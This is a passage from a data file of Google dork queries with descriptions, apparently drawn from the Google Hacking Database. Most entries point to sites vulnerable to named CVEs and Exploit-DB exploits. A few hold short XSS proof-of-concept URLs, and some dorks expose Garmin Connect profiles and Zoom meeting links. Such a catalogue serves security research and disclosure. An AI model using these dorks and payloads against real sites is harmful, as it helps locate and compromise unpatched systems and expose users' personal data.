site:www.openbugbounty.org + intext:\"Open Redirect\" + intext:\"Unpatched\"\r\n\r\nDescription : this dork gives you all unpatched sensitive websites\r\nvulnerable to open redirect\r\n\r\nAuthor : botsec0"}, {"dork": "intext:\"Powered by 74cms v5.0.1\"", "description": "# Google Dork: intext:\"Powered by 74cms v5.0.1\"\r\n# Description: Google Dork to find the pages vulnerable to CVE-2019-10684\r\n# Date: 04-16-2019\r\n# Author: Rahul B Pallickal\r\n# Contact: https://www.linkedin.com/in/rahulbpkl/"}, {"dork": "inurl:dnn.js", "description": "inurl:dnn.js Reveals Raw Javascript of the Dot Net Nuke CMS of websites that may be vulnerable to XSS ( CVE-2013-4649 ) via searching the page text for the string ' Type.registerNamespace(\"dnn\") ' .\r\n\r\nVulnerable versions: \r\n- DNN 7.1.0 and earlier\r\n- DNN 6.2.8 and earlier\r\n\r\nPOC: http://www.vulnerable.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'}"}, {"dork": "site:connect.garmin.com inurl:\"/modern/profile/\"", "description": "Obtain profiles of users of the social network for sportsmen Garmin \r\nConnect.\r\n\r\nReference: \r\nhttp://www.elladodelmal.com/2019/04/hacking-fitness-via-garmin-connect_24.html\r\n\r\nAuthor: Amador Aparicio, @amadapa"}, {"dork": "site:connect.garmin.com inurl:\"/modern/activity/\"", "description": "Obtain URLs of the sports activities of users of the social network for \r\nGarmin Connect athletes,\r\n\r\nReference: \r\nhttps://www.elladodelmal.com/2019/04/hacking-fitness-via-garmin-connect.html \r\n\r\n\r\nAuthor: Amador Aparicio, @amadapa"}, {"dork": "intitle:\"report\" (\"qualys\" | \"acunetix\" | \"nessus\" | \"netsparker\" | \"nmap\") filetype:pdf", "description": "This dork allows identification and detection of\r\nvulnerabilities arising from mis-configurations or flawed programming\r\nwithin a network-based asset such as a firewall, router, web server,\r\napplication server, etc from already scanned reports.\r\n\r\n*Google Dork :* intitle:\"report\" (\"qualys\" | \"acunetix\" | \"nessus\" |\r\n\"netsparker\" | \"nmap\") filetype:pdf\r\n\r\n*Exploit Author*:- Deepak Joshi"}, {"dork": "inurl:/secure/ContactAdministrators!default.jspa intext:\"Request Details\" -intext:\"Your Jira administrator has not yet configured this contact form\"", "description": "Dork: inurl:/secure/ContactAdministrators!default.jspa intext:\"Request\r\n\r\nDetails\" -intext:\"Your Jira administrator has not yet configured this\r\ncontact form\"\r\n\r\nCategory : Vulnerable Servers\r\n\r\nSummary:\r\n\r\nA Google dork that gives the information about Jira servers that may\r\nvulnerable to Template injection vulnerability [CVE-2019-11581]. \r\n\r\n*Dork discovered by:* *Sachin Wagh (@tiger_tigerboy)*\r\nReference:\r\n\r\nhttps://twitter.com/tiger_tigerboy/status/1151011237414629376"}, {"dork": "inurl:zoom.us/j and intext:scheduled for", "description": "Dorks:\r\n\r\ninurl:zoom.us/s\r\ninurl:zoom.us/j\r\ninurl:zoom.us/j and intext:scheduled for\r\n\r\nCategory : Sensitive Information\r\n\r\nSummary:\r\n\r\nA Google dork that gives the information about Zoom Meetings. *Dork\r\ndiscovered by:* *Sachin Wagh (@tiger_tigerboy)*"}, {"dork": "intext:Powered By vBulletin 5.5.4 inurl:forum.", "description": "Category: Advisories and Vulnerabilities\r\n\r\nAuthor: IdeaEngine007"}, {"dork": "inurl:\"index.cfm?action=\" intext:\"Exception in onError\"", "description": "I have found a vulnerability in error page of coldfusion,\r\n\r\nName of author: Marcos Almeida\r\n\r\nPoC\r\n\r\nXSS\r\nhttps://victimwebsite.com/?action=./ERROR?\">&fw1pk=3\r\n\r\nHTMLI\r\nhttps://victimwebsite.com/?action=./ERROR?\">ERROR&fw1pk=3"}, {"dork": "intext:\"Please enable JavaScript in your browser before using Citrix Receiver.\" AND intext:www.citrix.com", "description": "Description: Search for Citrix Gateway servers that could potentially be\r\nvulnerable to CVE-2019-19781\r\n\r\nAuthor: Ahmad Al-Nounou\r\n\r\nLinkdeIn: https://www.linkedin.com/in/ahmadalnounou/"}, {"dork": "intitle:\"kentico database setup\"", "description": "# Exploit Title: Google Dork for Kentico CVE-2017\u201317736\r\n# Google Dork: intitle:\"kentico database setup\"\r\n# Date: January 21, 2020\r\n# Exploit Author: Nathan Potter\r\n# Version: Kentico 8.X,"}, {"dork": "inurl:/cmsinstall/install ext:aspx", "description": "# Exploit Title: Google Dork for Kentico CVE-2017\u201317736\r\n# Google Dork: inurl:/cmsinstall/install ext:aspx\r\n# Date: January 21, 2020\r\n# Exploit Author: Nathan Potter\r\n# Version: Kentico 8.X,"}, {"dork": "inurl:ReportViewer.aspx", "description": "Dork: inurl:ReportViewer.aspx\r\nDate: 19 Feb 2020\r\nAuthor: rhinofense.com\r\n\r\nSearch for SSRS servers vulnerable to RCE (CVE-2020-0618)"}, {"dork": "\"Powered by Zimplit CMS\"", "description": "#Google Dork: \"Powered by Zimplit CMS\"\r\n\r\n# By using this dork, sites \"Powered by Zimplit CMS\" can be found. Zimplit\r\nCMS is prone to multiple cross-site-scripting vulnerabilities because it\r\nfails to properly sanitize user-supplied input. This is linked to the\r\nfollowing exploit: https://www.exploit-db.com/exploits/35063\r\n\r\n# Date: 30/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by sNews CMS\"", "description": "# Google Dork: \"Powered by sNews CMS\"\r\n\r\n# By using this dork, sites \"Powered by sNews CMS\" can be found. The\r\nvulnerability exists due to failure in the \"snews.php\" script to properly\r\nsanitize user-supplied input in \"website_title\" variable. Successful\r\nexploitation of this vulnerability could result in a compromise of the\r\napplication, theft of cookie-based authentication credentials, disclosure\r\nor modification of sensitive data.\r\nThis dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/15295\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by Podcast Generator\"", "description": "# Google Dork: \"Powered by Podcast Generator\"\r\n\r\n# By using this dork, sites \"Powered by Podcast Generator\" can be found.\r\nThe vulnerability exists due to failure in the \"/core/episode.php\" script\r\nto properly sanitize user-supplied input in \"name\" variable, it's possible\r\nto generate an error that will reveal the full path of the script. A remote\r\nuser can determine the full path to the web root directory and other\r\npotentially sensitive information. This dork is linked to the following\r\nexisting exploit: https://www.exploit-db.com/exploits/16109\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered By Liferay\"", "description": "# Google Dork: \"Powered By Liferay\"\r\n\r\n# By using this dork, sites \"Powered By Liferay\" can be found. Liferay\r\nPortal various versions are prone to multiple cross-site scripting\r\nvulnerabilities. This dork is linked to the following existing exploits:\r\nhttps://www.exploit-db.com/exploits/39626\r\nhttps://www.exploit-db.com/exploits/46983\r\nhttps://www.exploit-db.com/exploits/39880\r\nhttps://www.exploit-db.com/exploits/31082\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by SePortal 2.5\"", "description": "# Google Dork: \"Powered by SePortal 2.5\"\r\n\r\n# By using this dork, sites \"Powered by SePortal 2.5\" can be found.\r\nSePortal 2.5 is prone to an Sql Injection Vulnerability. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/32359\r\n\r\n# Date: 1/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by PHPBack\"", "description": "# Google Dork: \"Powered by PHPBack\"\r\n\r\n# By using this dork, sites \"Powered by PHPBack\" can be found. PHPBack\r\nv1.3.0 is vulnerable to Boolean blind and error based SQL Injection in the\r\n'orderby' parameter. By sending SQL Injection query using MySQL XPATH\r\nfunction ExtractValue() we can grab information from the errors generated.\r\nThis dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/39711\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by Lanius CMS\"", "description": "# Google Dork: \"Powered by Lanius CMS\"\r\n\r\n# By using this dork, sites \"Powered by Lanius CMS\" can be found. Lanius\r\nCMS various versions are prone to multiple SQL Injection vulnerabilities.\r\nThis dork is linked to the following existing exploits:\r\nhttps://www.exploit-db.com/exploits/30450\r\nhttps://www.exploit-db.com/exploits/30449\r\nhttps://www.exploit-db.com/exploits/30448\r\nhttps://www.exploit-db.com/exploits/5618\r\nhttps://www.exploit-db.com/exploits/4258\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "filetype:php inurl:\"/general/login.php?PHPSESSID=\"", "description": "# Google Dork: filetype:php inurl:\"/general/login.php?PHPSESSID=\"\r\n\r\n# By using this dork, sites running PHPCollab 2.5, which are prone to SQL\r\nInjection and other multiple vulnerabilities, can be found. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/37004\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:php-bin/webclient.php", "description": "# Google Dork: inurl:php-bin/webclient.php\r\n\r\n# By using this dork, sites vulnerable to 0day Alcatel-Lucent Omnivista\r\n8770 - Remote Code Execution, can be found. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/47761\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:/?op=registration", "description": "# Google Dork: inurl:/?op=registration\r\n\r\n# By using this dork, sites vulnerable to Xfilesharing 2.5.1 - Arbitrary\r\nFile Upload, can be found. This dork is linked to the following existing\r\nexploit: https://www.exploit-db.com/exploits/47659\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Powered by YouPHPTube\"", "description": "# Google Dork: intext:\"Powered by YouPHPTube\"\r\n\r\n# By using this dork, sites vulnerable to YouPHPTube"}, {"dork": "inurl:\"wp-contentpluginsall-in-one-seo-pack\"", "description": "# Google Dork: inurl:\"\\wp-content\\plugins\\all-in-one-seo-pack\"\r\n\r\n# By using this dork, sites vulnerable to all-in-one-seo-pack 3.2.7 -\r\nPersistent Cross-Site Scripting, can be found. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/47425\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"My Book World Edition - MyBookWorld\"", "description": "# Google Dork: intitle:\"My Book World Edition - MyBookWorld\"\r\n\r\n# By using this dork, sites vulnerable to Western Digital My Book World II\r\nNAS"}, {"dork": "inurl:\"index.php?option=com_jsjobs\"", "description": "# Google Dork: inurl:\"index.php?option=com_jsjobs\"\r\n\r\n# By using this dork, sites vulnerable to Joomla! component com_jsjobs -\r\n'customfields.php' SQL Injection, can be found. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/47249\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net", "description": "# Google Dork: intitle:qdPM 9.1. Copyright \u00a9 2020 qdpm.net\r\n\r\n# Sites vulnerable to qdPM < 9.1 - Remote Code Execution. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48146\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:zdm logon", "description": "# Google Dork: inurl:zdm logon\r\n\r\n# Sites vulnerable to Citrix XenMobile Server 10.8 - XML External Entity\r\nInjection. This dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47951\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:www/delivery filetype:php", "description": "# Google Dork: inurl:www/delivery filetype:php\r\n\r\n# Sites vulnerable to Revive Adserver 4.2 - Remote Code Execution. This\r\ndork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47739\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Please Login\" inurl:\"/remote/login\"", "description": "# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\"\r\n\r\n# FortiOS Leak file - Reading login/passwords in clear text. This dork is\r\nlinked to the following existing exploits:\r\nhttps://www.exploit-db.com/exploits/47287\r\nhttps://www.exploit-db.com/exploits/47288\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"/course/jumpto.php?jump=\"", "description": "# Google Dork: inurl:\"/course/jumpto.php?jump=\"\r\n\r\n# Moodle 3.4.1 - Remote Code Execution. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/46551\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"elFinder 2.1.x\"", "description": "# Google Dork: intitle:\"elFinder 2.1.x\"\r\n\r\n# elFinder"}, {"dork": "inurl:/wp-content/themes/CherryFramework", "description": "# Google Dork: inurl:/wp-content/themes/CherryFramework\r\n\r\n# Wordpress CherryFramework Themes 3.1.4 - Backup File Download. This dork\r\nis linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/45896\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:/webmail/ intext:Powered by IceWarp Server", "description": "# Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server\r\n\r\n# IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47988\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "index of /wp-content/themes/avada", "description": "Dork: index of /wp-content/themes/avada\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the Avada theme. Ref: https://wpvulndb.com/vulnerabilities/10209\r\nAuthor: Abhi Chitkara"}, {"dork": "index of /wp-content/themes/onetone/", "description": "Dork: index of /wp-content/themes/onetone/\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the onetone theme. Ref: https://wpvulndb.com/vulnerabilities/10165\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/wp-content/themes/listingpro/", "description": "Dork: inurl:/wp-content/themes/listingpro/\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the listingpro theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10025\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/wp-content/themes/traveler/", "description": "Dork: inurl:/wp-content/themes/traveler/\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the traveler theme. Ref: https://wpvulndb.com/vulnerabilities/10023\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/wp-content/themes/fruitful/", "description": "Dork: inurl:/wp-content/themes/fruitful/\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the fruitful theme. Ref: https://wpvulndb.com/vulnerabilities/10128\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-content/plugins/learnpress\"", "description": "Dork: inurl:\"wp-content/plugins/learnpress\"\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the LearnPress Plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10208\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-content/plugins/ninja-forms\"", "description": "Dork: inurl:\"wp-content/plugins/ninja-forms\"\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the ninja forms Plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10200\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/elementor-pro", "description": "Dork: inurl:wp-content/plugins/elementor-pro\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the Elementor Pro Plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10214\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/ultimate-elementor", "description": "Dork: inurl:wp-content/plugins/ultimate-elementor\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the Ultimate Elementor Plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10215\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/page-builder", "description": "Dork: inurl:wp-content/plugins/page-builder\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the page builder by site origin wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10219\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/chopslider", "description": "Dork: inurl:wp-content/plugins/chopslider\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the chopslider wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10216\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"index.php?option=com_hdwplayer\"", "description": "# Google Dork: inurl:\"index.php?option=com_hdwplayer\"\r\n\r\n# Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48242\r\n\r\n# Date: 14/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:index.php?option=com_newsfeeds", "description": "# Google Dork: inurl:index.php?option=com_newsfeeds\r\n\r\n# Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection. This dork\r\nis linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48202\r\n\r\n# Date: 14/05/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/easy-testimonials", "description": "Dork: inurl:wp-content/plugins/easy-testimonials\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the easy testimonials wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10223\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/google-site-kit", "description": "Dork: inurl:wp-content/plugins/google-site-kit\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the google site kit wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10224\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/photo-gallery", "description": "Dork: inurl:wp-content/plugins/photo-gallery\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the photo gallery wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10227\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/easy-login-woocommerce", "description": "Dork: inurl:wp-content/plugins/easy-login-woocommerce\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the easy login woocommerce wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10225\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wp-product-review", "description": "Dork: inurl:wp-content/plugins/wp-product-review\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp product review wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10226\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/team-members", "description": "Dork: inurl:wp-content/plugins/team-members\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the team members wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10228\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"index.php?option=com_fabrik\"", "description": "# Google Dork: inurl:\"index.php?option=com_fabrik\"\r\n\r\n# Joomla! com_fabrik 3.9.11 - Directory Traversal. This dork is linked to\r\nthe following existing exploit: https://www.exploit-db.com/exploits/48263\r\n\r\n# Date: 19/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:human.aspx intext:moveit", "description": "# Google Dork: inurl:human.aspx intext:moveit\r\n\r\n# MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection. This dork\r\nis linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48316\r\n\r\n# Date: 19/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"sites/all/modules/ckeditor\" -drupalcode.org", "description": "# Google Dork: inurl:\"sites/all/modules/ckeditor\" -drupalcode.org\r\n\r\n# Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site\r\nScripting. This dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/18389\r\n\r\n# Date: 19/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Created by John Caruso\" intext:\"Created with Simple PHP Photo Gallery\"", "description": "# Google Dork: intext:\"Created by John Caruso\"\r\nintext:\"Created with Simple PHP Photo Gallery\"\r\n\r\n# SimplePHPGal 0.7 - Remote File Inclusion. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/48424\r\n\r\n# Date: 19/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"LMS v3.0 - Xerone IT\"", "description": "# Google Dork: \"LMS v3.0 - Xerone IT\"\r\n\r\n# Xeroneit Library Management System 3.0 - 'category' SQL Injection. This\r\ndork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48328\r\n\r\n# Date: 20/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"index.php?option=com_jssupportticket\"", "description": "# Google Dork: inurl:\"index.php?option=com_jssupportticket\"\r\n\r\n# Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5\r\n- Arbitrary File Download. This dork is linked to the following existing\r\nexploit: https://www.exploit-db.com/exploits/47216\r\n\r\n# Date: 20/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/visualcomposer", "description": "Dork: inurl:wp-content/plugins/visualcomposer\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the visual composer wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10229\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/ajax-load-more", "description": "Dork: inurl:wp-content/plugins/ajax-load-more\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the ajax load more wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10230\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/paid-memberships-pro", "description": "Dork: inurl:wp-content/plugins/paid-memberships-pro\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the paid memberships pro wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10231\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/thirstyaffiliates", "description": "Dork: inurl:wp-content/plugins/thirstyaffiliates\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the thirsty affiliates wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10234\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/official-mailerlite-sign-up-forms", "description": "Dork: inurl:wp-content/plugins/official-mailerlite-sign-up-forms\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the Official MailerLite Sign Up Forms wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10235\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-content/plugins/form-maker\"", "description": "Dork: inurl:\"wp-content/plugins/form-maker\"\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the form maker wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10237\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"index.php?option=com_ccnewsletter\" inurl:sbid", "description": "# Google Dork: inurl:\"index.php?option=com_ccnewsletter\" inurl:sbid\r\n\r\n# Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/42387\r\n\r\n# Date: 26/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" intitle:\"UserPro\" -uploads", "description": "# Google Dork: intitle:\"Index of\" intitle:\"UserPro\" -uploads\r\n\r\n# WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47304\r\n\r\n# Date: 26/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7", "description": "Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the drag and drop multiple file upload wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10238\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-content/plugins/siteorigin-panels\"", "description": "Dork: inurl:\"wp-content/plugins/siteorigin-panels\"\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the siteorigin panels wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10219\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/iframe", "description": "Dork: inurl:wp-content/plugins/iframe\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the iframe wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10221\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/woo-order-export-lite", "description": "Dork: inurl:wp-content/plugins/iframe\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the woo order export lite wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10212\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/grand-media", "description": "Dork: inurl:wp-content/plugins/grand-media\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the grand media wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10197\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/bbPress", "description": "Dork: inurl:wp-content/plugins/bbPress\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the bbPress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10244\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/gtranslate", "description": "Dork: inurl:wp-content/plugins/gtranslate\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the gtranslate wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10181\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/adrotate", "description": "Dork: inurl:wp-content/plugins/adrotate\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the ad rotate wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10249\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/mappress-google-maps-for-wordpress", "description": "Dork: inurl:wp-content/plugins/mappress-google-maps-for-wordpress\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the mappress-google-maps-for-wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10246\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/yop-poll", "description": "Dork: inurl:wp-content/plugins/yop-poll\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the Yop Poll wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10189\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/ajax-load-more/lang/", "description": "Dork:\r\ninurl:wp-content/plugins/ajax-load-more/lang/\r\n\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the ajax load more WordPress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/10230\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:wp-content/plugins/woocommerce", "description": "Dork: inurl:wp-content/plugins/woocommerce\r\n\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the woo-commerce WordPress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/10220\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:wp-content/plugins/simple-file-list", "description": "Dork: inurl:wp-content/plugins/simple-file-list\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the simple-file-list wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10192\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/final-tiles-grid-gallery-lite", "description": "Dork: inurl:wp-content/plugins/final-tiles-grid-gallery-lite\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the final tiles grid gallery lite wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10241\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/wp-content/plugins/wp-ecommerce-shop-styling/", "description": "Dork: inurl:/wp-content/plugins/wp-ecommerce-shop-styling/\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the WP e-Commerce Shop Styling wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/8079\r\nAuthor: Akash Solanki (MAALP)"}, {"dork": "inurl:wp-content/plugins/wp-jobsearch", "description": "Dork: inurl:wp-content/plugins/wp-jobsearch\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp-jobsearch wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10255\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/final-tiles-grid-gallery-lite", "description": "Dork: inurl:wp-content/plugins/final-tiles-grid-gallery-lite\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the final-tiles-grid-gallery-lite wordpress plugin. 